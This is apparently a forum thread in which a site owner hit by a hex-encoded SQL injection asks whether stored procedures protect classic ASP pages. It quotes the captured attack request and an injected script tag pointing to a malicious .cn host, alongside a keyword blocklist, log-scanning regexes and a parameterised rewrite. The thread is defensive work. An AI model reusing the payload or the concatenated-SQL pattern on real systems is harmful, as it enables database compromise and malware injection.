rito1
asked on
Stored Procedures Prevent Injection Attacks?
Hi All
A website of ours has recently been hit by an injection attack which is corrupting our data within the following line <script src=http://www.dota11 .cn / m.js></script> (added spaces to prevent anyone from clicking it by mistake!)
I have been going through my weblogs and have located where they have tried to perform the attack... Obviously one of our files is vulnerable, but inspecting the majority of these files, they actually trigger a stored procedure rather than use inline code.
Please could anyone confirm that I should be looking for inline code instances and am safe to leave the stored-procedure-referenced pages as they are?
Is there a cool gadget that can test for vulnerabilities on certain pages or is it more of a painstaking job?
Many thanks,
Rit
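The weblog triage the question describes, as an added example that is not code from this thread: a cscript script that walks IIS-style log lines and flags requests carrying the hex-encoded DECLARE/CAST/EXEC injection of the kind quoted in this thread, reporting the page and the query-string parameter that carried it. The log lines are constructed samples in a simplified W3C layout (date, time, method, uri-stem, uri-query, status), and the three signature patterns are my own choice; adjust the field indexes for a real log.

```vbscript
' Added example, not code from the thread: scan IIS-style web log lines for the
' hex-encoded DECLARE/CAST/EXEC SQL injection and report which page and which
' query-string parameter carried it.
' The log lines are constructed samples in a simplified W3C layout
' (date time method uri-stem uri-query status); adjust the field indexes for a real log.
' Run with:  cscript //nologo scanlog.vbs
Option Explicit

Dim sampleLog
sampleLog = Array( _
    "2008-05-12 10:01:03 GET /news.asp newsid=450 200", _
    "2008-05-12 10:01:09 GET /show_image.asp imageid=2954&newsid=450';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00%20AS%20NVARCHAR(4000));EXEC(@S); 200", _
    "2008-05-12 10:02:15 GET /show_image.asp imageid=12&newsid=7 200", _
    "2008-05-12 10:03:40 GET /search.asp q=declare%20independence 200")

' Minimal %xx and '+' decoder so the signatures are matched on decoded text
Function UrlDecode(s)
    Dim i, ch, out, hexPair
    Set hexPair = New RegExp
    hexPair.Pattern = "^[0-9A-Fa-f]{2}$"
    out = ""
    i = 1
    Do While i <= Len(s)
        ch = Mid(s, i, 1)
        If ch = "+" Then
            out = out & " "
            i = i + 1
        ElseIf ch = "%" And hexPair.Test(Mid(s, i + 1, 2)) Then
            out = out & Chr(CLng("&H" & Mid(s, i + 1, 2)))
            i = i + 3
        Else
            out = out & ch
            i = i + 1
        End If
    Loop
    UrlDecode = out
End Function

' Returns an empty string for a clean value, otherwise the name of the signature hit.
' "declare independence" in a search box does not match: the patterns require the
' @variable / hex-literal shape, not just the keyword.
Function InjectionSignature(value)
    Dim decoded, re, patterns, names, i
    decoded = UrlDecode(value)
    patterns = Array("cast\s*\(\s*0x[0-9a-f]{8,}", "declare\s+@\w+\s+n?varchar", "exec\s*\(\s*@\w+\s*\)")
    names = Array("hex CAST literal", "DECLARE of a string variable", "EXEC of a variable")
    Set re = New RegExp
    re.IgnoreCase = True
    InjectionSignature = ""
    For i = 0 To UBound(patterns)
        re.Pattern = patterns(i)
        If re.Test(decoded) Then
            InjectionSignature = names(i)
            Exit Function
        End If
    Next
End Function

' Walk the lines, split the query string on '&' and test each parameter value
Sub ScanLines(lines)
    Dim entry, f, params, kv, sig, i
    For Each entry In lines
        f = Split(entry, " ")
        If UBound(f) >= 4 Then
            params = Split(f(4), "&")
            For i = 0 To UBound(params)
                kv = Split(params(i), "=", 2)   ' limit to 2 pieces: the payload itself contains '='
                If UBound(kv) = 1 Then
                    sig = InjectionSignature(kv(1))
                    If sig <> "" Then
                        WScript.Echo f(0) & " " & f(1) & "  " & f(3) & "  parameter '" & kv(0) & "': " & sig
                    End If
                End If
            Next
        End If
    Next
End Sub

ScanLines sampleLog
```

On the sample above only the show_image.asp line is reported, against the newsid parameter, which is the page-and-parameter pair worth checking first in the source. Decoding before matching matters because the same payload arrives with spaces as %20 or +.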
ASKER CERTIFIED SOLUTION
ASKER
Hi dosth,
Thanks very much. My VB is a little poor... could you briefly explain what your code does?
Would it stop the following request?
show_image.asp?imageid=2954&newsid=450';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760061007200630068006100720028003200350035002900200044004500430041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D00650020006600720006F006D00200073007900730006F0062006A0065006300740073002000610002C007300790073006300006F006C0075006D006E007300200062002000770068006500720065002000610002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027007500270020006100060064002000280062002E0078007400790070006500030D003900390020006F00720020006200 2E00780074... 
SOLUTION
Yes, it will. You see, I have added this EXEC(; I added all DDL commands and a few DML commands to exclude, so anything that comes in the querystring will not get through.
sqlArray = "select%20|delete%20|update%20|insert%20|create%20|alter%20|drop%20|truncate%20|sp_|declare%20|exec("
ASKER
Excellent, thanks both.
Thanks for the points.
Likewise, thanks for the grade.
Sorry @dosth, hope you didn't think that I was attacking your solution, I wasn't. I was just trying to offer an alternative viewpoint, something that I believe is referred to as "accept known good". I'm sure your solution does the job, I wasn't doubting that for a moment. I was just trying to point out that this approach of denying input that is regarded as "bad", rather than only allowing input that is regarded as "good", i.e. only digits in number fields, holds a greater potential to fall foul of new exploits as they become available.
There is some very interesting reading for us all on the following site:
http://www.owasp.org/index.php/Top_10_2007
I agree, my solution is good to stop the attack immediately until we figure out the best approach.
ASKER
I am dealing with an ASP-written site which is quite dated now.
Here is an example of the way in which it executes a stored procedure... can you see any vulnerabilities in this?
Many thanks
Rit
Function GetConnection()
    Dim objConn
    Set objConn = Server.CreateObject("ADODB.Connection")   ' line was truncated in the post; completed from context
    objConn.Open strDSNless
    Set GetConnection = objConn
End Function

Function GetRecordset(sSQL)
    Dim objConn
    ' Response.Write(sSQL & "<br>")
    ' Response.Flush
    Set objConn = GetConnection()
    Set GetRecordset = objConn.Execute(sSQL)
    Set objConn = Nothing
End Function

Dim newsID
newsID = Request.QueryString("newsid")   ' line was truncated in the post; parameter name taken from the request URL quoted above
strSQL = "EXECUTE GetNewsItem " & newsID   ' the raw query-string value is concatenated straight into the SQL batch
Set objRS = GetRecordset(strSQL)
The stored procedure for this example looks like this:
CREATE PROCEDURE dbo.GetNewsItem
    @NewsID int
AS
    SELECT
        N.*,
        B.BaseCount,
        E.EmbeddedCount
    FROM
        NewsItems AS N
        LEFT OUTER JOIN
        (
            SELECT
                NewsID,
                COUNT(*) AS BaseCount
            FROM
                NewsImages
            WHERE
                NewsID = @NewsID AND
                Embedded = 0
            GROUP BY
                NewsID
        ) AS B ON N.NewsID = B.NewsID
        LEFT OUTER JOIN
        (
            SELECT
                NewsID,
                COUNT(*) AS EmbeddedCount
            FROM
                NewsImages
            WHERE
                NewsID = @NewsID AND
                Embedded = 1
            GROUP BY
                NewsID
        ) AS E ON N.NewsID = E.NewsID
    WHERE
        N.NewsID = @NewsID
GO
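The GetNewsItem page posted above and the "accept known good" point raised earlier in the thread, as one added example that is not the site's own code. The stored procedure itself is fine: @NewsID is a typed parameter. The weak spot is the call site, where "EXECUTE GetNewsItem " & newsID builds the SQL batch as text before the procedure is ever reached, so a value like 450';DECLARE ... is run as extra statements. The example keeps that pattern as GetNewsItemUnsafe for comparison and adds GetNewsItemSafe, which validates the id as digits only and passes it through ADODB.Command as an integer parameter. It assumes strDSNless holds the connection string as in the post, and that Server, Request and Response are the ASP intrinsic objects; the ADO constant values are the standard ones from adovbs.inc.

```vbscript
' Added example, not the site's code: the GetNewsItem call written two ways.
' GetNewsItemUnsafe is the pattern from the post; GetNewsItemSafe validates
' the input ("accept known good": a news id is digits and nothing else) and
' passes it to the procedure as a typed parameter through ADODB.Command.
' Assumed: strDSNless holds the connection string as in the post, and
' Server/Request/Response are the ASP intrinsic objects.

' --- Vulnerable: the raw query-string value is spliced into the SQL batch.
' newsid=450';DECLARE ... becomes the batch "EXECUTE GetNewsItem 450';DECLARE ..."
' and SQL Server runs the extra statements. The procedure declaring @NewsID int
' does not help, because the text is assembled before the procedure is called.
Function GetNewsItemUnsafe(rawNewsId)
    Dim objConn
    Set objConn = Server.CreateObject("ADODB.Connection")
    objConn.Open strDSNless
    Set GetNewsItemUnsafe = objConn.Execute("EXECUTE GetNewsItem " & rawNewsId)
End Function

' --- Accept known good: returns True and sets newsId only for 1 to 9 decimal
' digits (fits a SQL int); a quote, semicolon, space or letter is rejected outright.
Function ParseNewsId(rawValue, ByRef newsId)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    ParseNewsId = re.Test(rawValue)
    If ParseNewsId Then newsId = CLng(rawValue)
End Function

' --- Safe: the id travels as an integer parameter, never as part of the SQL text.
Function GetNewsItemSafe(newsId)
    Const adCmdStoredProc = 4   ' standard ADO constants; adovbs.inc defines them by name
    Const adInteger = 3
    Const adParamInput = 1
    Dim objConn, cmd
    Set objConn = Server.CreateObject("ADODB.Connection")
    objConn.Open strDSNless
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = objConn
    cmd.CommandType = adCmdStoredProc
    cmd.CommandText = "dbo.GetNewsItem"
    cmd.Parameters.Append cmd.CreateParameter("@NewsID", adInteger, adParamInput, 4, newsId)
    Set GetNewsItemSafe = cmd.Execute()
End Function

' --- Page handler: reject anything that is not a plain integer before touching the database.
Dim newsId, objRS
If Not ParseNewsId(CStr(Request.QueryString("newsid")), newsId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid news id"
    Response.End
End If
Set objRS = GetNewsItemSafe(newsId)
```

The same two changes apply to every page that builds "EXECUTE procname " & value: the allow-list check on its own already blocks the quoted request, and the typed parameter means a future bypass of the check still cannot reach the database as SQL text. Pages whose procedures take string arguments need the Command object even more, since there is no digits-only rule to fall back on.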